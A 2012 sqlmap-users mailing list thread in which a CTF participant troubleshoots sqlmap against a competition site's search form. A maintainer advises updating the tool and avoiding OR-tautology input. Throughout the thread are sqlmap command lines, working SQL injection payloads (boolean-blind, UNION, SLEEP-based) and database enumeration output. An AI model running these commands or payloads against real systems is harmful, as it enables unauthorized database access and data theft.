Okay I resolved..:)
Thanks a lot Chris and Miroslav...I resolved this problem..:)
not sqlmap 1.0 but r4766
not sqlmap 0.9 but r5022
it should be 1.0 and r5022
Thanks so much again:)
Best Regards
27 Nisan 2012 20:42 tarihinde Chris Oakley <christopher.oak...@gmail.com>yazdı:
> Hi
>
> Just thought I'd point out that it looks like you're running 0.9 stable
> and not the 1.0 latest repository version.
>
> Regards
>
> Chris
>
>
> 2012/4/27 Fırat Celal Erdik <fc.er...@gmail.com>
>
>> Hi Miroslav,
>> First thanks a lot for your fast reply.. I found this value( *38' OR
>> '38'='38 )* from w3af output.you know too,w3af is a vulnerability
>> scanner for web application.I get this value from w3af.And I attached a
>> w3af screenshot about this vulnerability.This is a boolean-based sql
>> injection..
>>
>> When I was give this value(*38' OR '38'='38*) to "kelime" parameter
>> manually in sqlmap r4766 revision, I had below output for enumurating
>> database names.
>>
>> *root@pamuksekeri-pc:/pentest/database/sqlmap# ./sqlmap.py -u
>> http://level4.hack2net.com/projects.php --forms --dbs*
>> *.....*
>> *.....*
>> *POST http://level4.hack2net.com:80/projects.php?form=ara*
>> *POST data: kelime=&tur=1&aramayap=Ara*
>> *do you want to test this form? [Y/n/q] *
>> *> y*
>> *
>> *
>> *.....*
>> *.....*
>> *Edit POST data [default: kelime=&tur=1&aramayap=Ara] (Warning: blank
>> fields detected): kelime=38' OR '38'='38*
>> *.....*
>> *.....*
>> *
>> *
>> *web application technology: PHP 5.3.5*
>> *back-end DBMS: MySQL 5.0.11*
>> *[17:27:54] [INFO] fetching database names*
>> *available databases [4]:*
>> *[*] ctf2*
>> *[*] information_schema*
>> *[*] mysql*
>> *[*] test*
>>
>> After this database names enumuration, I give below command for
>> enumurating table names but sqlmqp didnt find any table names:
>>
>> *root@pamuksekeri-pc:/pentest/database/sqlmap# ./sqlmap.py -u
>> http://level4.hack2net.com/projects.php --forms -D ctf2 --tables*
>> *.....*
>> *.....*
>> *POST http://level4.hack2net.com:80/projects.php?form=ara*
>> *POST data: kelime=&tur=1&aramayap=Ara*
>> *do you want to test this form? [Y/n/q] *
>> *> y*
>> *Edit POST data [default: kelime=&tur=1&aramayap=Ara] (Warning: blank
>> fields detected): kelime=38' OR '38'='38*
>> *.....*
>> *.....*
>> but sqlmap didnt any table names,it passed second form.
>>
>> I updated to sqlmap r5022 revision now..but I didnt get any database
>> names now:) output is below.
>>
>> *root@pamuksekeri-pc:/home/pamuksekeri/Desktop/sqlmap# ./sqlmap.py -u
>> http://level4.hack2net.com/projects.php --forms --dbs*
>>
>> sqlmap/0.9 - automatic SQL injection and database takeover tool
>> http://sqlmap.sourceforge.net
>>
>> [*] starting at: 19:46:09
>>
>> [19:46:12] [INFO] testing connection to the target url
>> [19:46:21] [INFO] searching for forms
>> [19:46:22] [INFO] sqlmap got a total of 2 targets
>> [#1] form:
>> POST http://level4.hack2net.com:80/projects.php?form=ara
>> POST data: kelime=&tur=1&aramayap=Ara
>> do you want to test this form? [Y/n/q]
>> > y
>> *Edit POST data [default: kelime=&tur=1&aramayap=Ara] (Warning: blank
>> fields detected): kelime=38' OR '38'='38&tur=4&aramayap=Ara*
>> [19:47:31] [INFO] using '/home/pamuksekeri/Desktop/sqlmap/output/
>> level4.hack2net.com/session' as session file
>> [19:47:50] [INFO] testing if the url is stable, wait a few seconds
>> [19:47:54] [INFO] url is stable
>> [19:47:54] [INFO] testing if POST parameter 'tur' is dynamic
>> [19:47:59] [INFO] confirming that POST parameter 'tur' is dynamic
>> [19:48:00] [INFO] POST parameter 'tur' is dynamic
>> [19:48:01] [WARNING] heuristic test shows that POST parameter 'tur' might
>> not be injectable
>> [19:48:01] [INFO] testing sql injection on POST parameter 'tur'
>> [19:48:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING
>> clause'
>> [19:48:23] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING
>> clause'
>> [19:48:26] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING
>> clause'
>> [19:48:29] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based -
>> WHERE or HAVING clause'
>> [19:48:32] [INFO] testing 'Oracle AND error-based - WHERE or HAVING
>> clause (XMLType)'
>> [19:48:36] [INFO] testing 'MySQL > 5.0.11 stacked queries'
>> [19:48:39] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
>> [19:48:42] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
>> [19:48:46] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
>> [19:48:49] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
>> [19:48:52] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
>> [19:48:56] [INFO] testing 'Oracle AND time-based blind'
>> [19:49:01] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
>> [19:49:49] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
>> [19:49:49] [WARNING] using unescaped version of the test because of zero
>> knowledge of the back-end DBMS
>> [19:50:51] [WARNING] POST parameter 'tur' is not injectable
>> [19:50:51] [INFO] testing if POST parameter 'aramayap' is dynamic
>> [19:50:52] [WARNING] POST parameter 'aramayap' is not dynamic
>> [19:50:53] [WARNING] heuristic test shows that POST parameter 'aramayap'
>> might not be injectable
>> [19:50:53] [INFO] testing sql injection on POST parameter 'aramayap'
>> [19:50:53] [INFO] testing 'AND boolean-based blind - WHERE or HAVING
>> clause'
>> [19:51:03] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING
>> clause'
>> [19:51:06] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING
>> clause'
>> [19:51:10] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based -
>> WHERE or HAVING clause'
>> [19:51:16] [INFO] testing 'Oracle AND error-based - WHERE or HAVING
>> clause (XMLType)'
>> [19:51:22] [INFO] testing 'MySQL > 5.0.11 stacked queries'
>> [19:51:27] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
>> [19:51:33] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
>> [19:51:39] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
>> [19:51:44] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
>> [19:51:50] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
>> [19:51:56] [INFO] testing 'Oracle AND time-based blind'
>> [19:52:00] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
>> [19:52:49] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
>> [19:52:49] [WARNING] using unescaped version of the test because of zero
>> knowledge of the back-end DBMS
>> [19:53:47] [CRITICAL] connection timed out to the target url or proxy,
>> sqlmap is going to retry the request
>> [19:54:04] [WARNING] POST parameter 'aramayap' is not injectable
>> [19:54:04] [INFO] testing if GET parameter 'form' is dynamic
>> [19:54:06] [WARNING] GET parameter 'form' is not dynamic
>> [19:54:07] [WARNING] heuristic test shows that GET parameter 'form' might
>> not be injectable
>> [19:54:07] [INFO] testing sql injection on GET parameter 'form'
>> [19:54:07] [INFO] testing 'AND boolean-based blind - WHERE or HAVING
>> clause'
>> [19:54:34] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING
>> clause'
>> [19:54:54] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING
>> clause'
>> [19:55:00] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based -
>> WHERE or HAVING clause'
>> [19:55:07] [INFO] testing 'Oracle AND error-based - WHERE or HAVING
>> clause (XMLType)'
>> [19:55:17] [INFO] testing 'MySQL > 5.0.11 stacked queries'
>> [19:55:20] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
>> [19:55:23] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
>> [19:55:27] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
>> [19:55:30] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
>> [19:55:34] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
>> [19:55:39] [INFO] testing 'Oracle AND time-based blind'
>> [19:55:44] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
>> [19:57:05] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
>> [19:57:05] [WARNING] using unescaped version of the test because of zero
>> knowledge of the back-end DBMS
>> [19:57:53] [WARNING] GET parameter 'form' is not injectable
>> [19:57:54] [ERROR] all parameters are not injectable, try to increase
>> --level/--risk values to perform more tests. Rerun without providing the
>> --technique switch. Give it a go with the --text-only switch if the target
>> page has a low percentage of textual content (~22.06% of page content is
>> text), skipping to the next form
>> [#2] form:
>> POST http://level4.hack2net.com:80/projects.php
>> POST data: Ara=Ara
>> do you want to test this form? [Y/n/q]
>> > n
>>
>> [*] shutting down at: 20:04:22
>>
>> And then I passed with enter without editing post data in this command.
>> output is below.(in revision r5022)
>>
>> *root@pamuksekeri-pc:/home/pamuksekeri/Desktop/sqlmap# ./sqlmap.py -u
>> http://level4.hack2net.com/projects.php --forms --dbs*
>>
>> sqlmap/0.9 - automatic SQL injection and database takeover tool
>> http://sqlmap.sourceforge.net
>>
>> [*] starting at: 20:04:31
>>
>> [20:04:32] [INFO] testing connection to the target url
>> [20:04:39] [INFO] searching for forms
>> [20:04:40] [INFO] sqlmap got a total of 2 targets
>> [#1] form:
>> POST http://level4.hack2net.com:80/projects.php?form=ara
>> POST data: kelime=&tur=1&aramayap=Ara
>> do you want to test this form? [Y/n/q]
>> > y
>> *Edit POST data [default: kelime=&tur=1&aramayap=Ara] (Warning: blank
>> fields detected): *
>> do you want to fill blank fields with random values? [Y/n] y
>> [20:04:46] [INFO] using '/home/pamuksekeri/Desktop/sqlmap/output/
>> level4.hack2net.com/session' as session file
>> [20:04:48] [INFO] testing if the url is stable, wait a few seconds
>> [20:04:50] [INFO] url is stable
>> [20:04:50] [INFO] testing if POST parameter 'kelime' is dynamic
>> [20:04:52] [WARNING] POST parameter 'kelime' is not dynamic
>> [20:04:54] [WARNING] heuristic test shows that POST parameter 'kelime'
>> might not be injectable
>> [20:04:54] [INFO] testing sql injection on POST parameter 'kelime'
>> [20:04:54] [INFO] testing 'AND boolean-based blind - WHERE or HAVING
>> clause'
>> [20:05:10] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING
>> clause'
>> [20:05:15] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING
>> clause'
>> [20:05:20] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based -
>> WHERE or HAVING clause'
>> [20:05:27] [INFO] testing 'Oracle AND error-based - WHERE or HAVING
>> clause (XMLType)'
>> [20:05:33] [INFO] testing 'MySQL > 5.0.11 stacked queries'
>> [20:05:38] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
>> [20:05:43] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
>> [20:05:48] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
>> [20:05:55] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
>> [20:06:00] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
>> [20:06:05] [INFO] testing 'Oracle AND time-based blind'
>> [20:06:11] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
>> [20:06:21] [CRITICAL] unable to connect to the target url or proxy,
>> sqlmap is going to retry the request
>> [20:07:15] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
>> [20:07:15] [WARNING] using unescaped version of the test because of zero
>> knowledge of the back-end DBMS
>> *[20:08:07] [WARNING] POST parameter 'kelime' is not injectable*
>>
>> sqlmap said, kelime parameter is not vulnerable :) why ?? I know this
>> parameter vulnerable..because other competitors in CTF exploited this
>> vulnerability and got all data in database :) w3af outputs says this
>> parameter vulnerable
>>
>> How can I find rihgt vulnerable point in http://level4.hack2net.com/ and
>> exploit it successful.If you have any time and help me about this topic, I
>> will so happy :)
>>
>> Thanks a lot again.
>> Best Regards
>>
>>
>> 27 Nisan 2012 16:17 tarihinde Miroslav Stampar <
>> miroslav.stam...@gmail.com> yazdı:
>>
>> Hi Firat.
>>>
>>> First of all please always keep your sqlmap up to date. Current revision
>>> is r5022 and you are running r4766.
>>>
>>> Second, could you please explain how did you get "*OR '38'='38'"*inside
>>> those payloads. We already have mechanisms to prevent this kind of
>>> "user behavior" but you've obviously circumvented that somehow (--prefix or
>>> maybe you've entered that one manually inside form search prompts). Thing
>>> is that OR A=A is never a smart thing to do inside a SQL injection tool(s).
>>> That's simply because OR 1=1 always results in TRUE potentially screwing
>>> user with false results.
>>>
>>> Third, it would be great if you could send database names you've
>>> retrieved. It's quite possible that there are some permission problems you
>>> are experiencing around system "mysql" database. Also, you are maybe
>>> experiencing permission problems when accessing "information_schema"
>>> database for retrieving identifier names.
>>>
>>> Kind regards,
>>> Miroslav Stampar
>>>
>>> 2012/4/27 Fırat Celal Erdik <fc.er...@gmail.com>
>>>
>>>> Hi,
>>>> is there anybody help me about a mysql boolean based sql injection
>>>> exploitation with sqlmap..I found database names with sqlmap but I didnt
>>>> find any tables from any database..I dont want to use for finding table
>>>> names from a common table names file.. So, how can I take full table names
>>>> with sqlmap or another tool..I tried havij but I can not find any table
>>>> name with it ..is there any idea ?
>>>>
>>>> I had this error on sqlmap :
>>>>
>>>> *./sqlmap.py -u http://level4.hack2net.com/projects.php --forms -D
>>>> mysql --tables*
>>>> *
>>>> *
>>>> * sqlmap/1.0-dev (r4766) - automatic SQL injection and database
>>>> takeover tool*
>>>> * http://www.sqlmap.org*
>>>> *
>>>> *
>>>> *[!] legal disclaimer: usage of sqlmap for attacking targets without
>>>> prior mutual consent is illegal. It is the end user's responsibility to
>>>> obey all applicable local, state and federal laws. Authors assume no
>>>> liability and are not responsible for any misuse or damage caused by this
>>>> program*
>>>> *
>>>> *
>>>> *[*] starting at 15:01:42*
>>>> *
>>>> *
>>>> *[15:01:42] [INFO] testing connection to the target url*
>>>> *[15:01:43] [INFO] searching for forms*
>>>> *[15:01:43] [INFO] sqlmap got a total of 2 targets*
>>>> *[#1] form:*
>>>> *POST http://level4.hack2net.com:80/projects.php?form=ara*
>>>> *POST data: kelime=&tur=1&aramayap=Ara*
>>>> *do you want to test this form? [Y/n/q] *
>>>> *> y*
>>>> *Edit POST data [default: kelime=&tur=1&aramayap=Ara] (Warning: blank
>>>> fields detected): *
>>>> *do you want to fill blank fields with random values? [Y/n] y*
>>>> *[15:01:50] [INFO] using '/pentest/database/sqlmap/output/
>>>> level4.hack2net.com/session' as session file*
>>>> *[15:01:50] [INFO] resuming injection data from session file*
>>>> *[15:01:50] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session
>>>> file*
>>>> *[15:01:50] [INFO] using
>>>> '/pentest/database/sqlmap/output/results-04272012_0301pm.csv' as results
>>>> file*
>>>> *sqlmap identified the following injection points with a total of 0
>>>> HTTP(s) requests:*
>>>> *---*
>>>> *Place: POST*
>>>> *Parameter: kelime*
>>>> * Type: boolean-based blind*
>>>> * Title: AND boolean-based blind - WHERE or HAVING clause*
>>>> * Payload: kelime=38' OR '38'='38' AND 5116=5116 AND
>>>> 'Hbnf'='Hbnf&tur=4&aramayap=Ara*
>>>> *
>>>> *
>>>> * Type: UNION query*
>>>> * Title: MySQL UNION query (NULL) - 5 columns*
>>>> * Payload: kelime=38' OR '38'='38' UNION ALL SELECT
>>>> CONCAT(0x3a6e656f3a,0x65594a514b5846697976,0x3a776f673a), NULL, NULL, NULL,
>>>> NULL# AND 'ecra'='ecra&tur=4&aramayap=Ara*
>>>> *
>>>> *
>>>> * Type: AND/OR time-based blind*
>>>> * Title: MySQL > 5.0.11 AND time-based blind*
>>>> * Payload: kelime=38' OR '38'='38' AND SLEEP(5) AND
>>>> 'mlpI'='mlpI&tur=4&aramayap=Ara*
>>>> *---*
>>>> *
>>>> *
>>>> *do you want to exploit this SQL injection? [Y/n] y*
>>>> *[15:01:56] [INFO] the back-end DBMS is MySQL*
>>>> *
>>>> *
>>>> *web application technology: PHP 5.3.5*
>>>> *back-end DBMS: MySQL 5.0.11*
>>>> *[15:01:56] [INFO] fetching tables for database: mysql*
>>>> *[15:01:56] [INFO] fetching number of tables for database 'mysql'*
>>>> *[15:01:56] [WARNING] running in a single-thread mode. Please consider
>>>> usage of option '--threads' for faster data retrieval*
>>>> *[15:01:56] [INFO] retrieved: *
>>>> *[15:01:58] [WARNING] unable to retrieve the number of tables for
>>>> database 'mysql'*
>>>> *[15:01:58] [ERROR] unable to retrieve the table names for any database
>>>> *
>>>> *do you want to use common table existence check? [Y/n/q] *
>>>>
>>>> Thanks a lot..
>>>>
>>>> --
>>>> *Fırat Celal Erdik
>>>> Security Specialist, Certified Ethical Hacker - C|EH**
>>>> http://www.networkpentest.net*
>>>>
>>>>
>>>>
>>>>
>>>> ------------------------------------------------------------------------------
>>>> Live Security Virtual Conference
>>>> Exclusive live event will cover all the ways today's security and
>>>> threat landscape has changed and how IT managers can respond.
>>>> Discussions
>>>> will include endpoint security, mobile security and the latest in
>>>> malware
>>>> threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
>>>> _______________________________________________
>>>> sqlmap-users mailing list
>>>> sqlmap-users@lists.sourceforge.net
>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>>
>>>>
>>>
>>>
>>> --
>>> Miroslav Stampar
>>> http://about.me/stamparm
>>>
>>
>>
>>
>> --
>> *Fırat Celal Erdik
>> Security Specialist, Certified Ethical Hacker - C|EH**
>> http://www.networkpentest.net*
>>
>>
>>
>>
>> ------------------------------------------------------------------------------
>> Live Security Virtual Conference
>> Exclusive live event will cover all the ways today's security and
>> threat landscape has changed and how IT managers can respond. Discussions
>> will include endpoint security, mobile security and the latest in malware
>> threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
>> _______________________________________________
>> sqlmap-users mailing list
>> sqlmap-users@lists.sourceforge.net
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>>
>
--
*Fırat Celal Erdik
Security Specialist, Certified Ethical Hacker - C|EH**
http://www.networkpentest.net*
------------------------------------------------------------------------------
Live Security Virtual Conference
Exclusive live event will cover all the ways today's security and
threat landscape has changed and how IT managers can respond. Discussions
will include endpoint security, mobile security and the latest in malware
threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
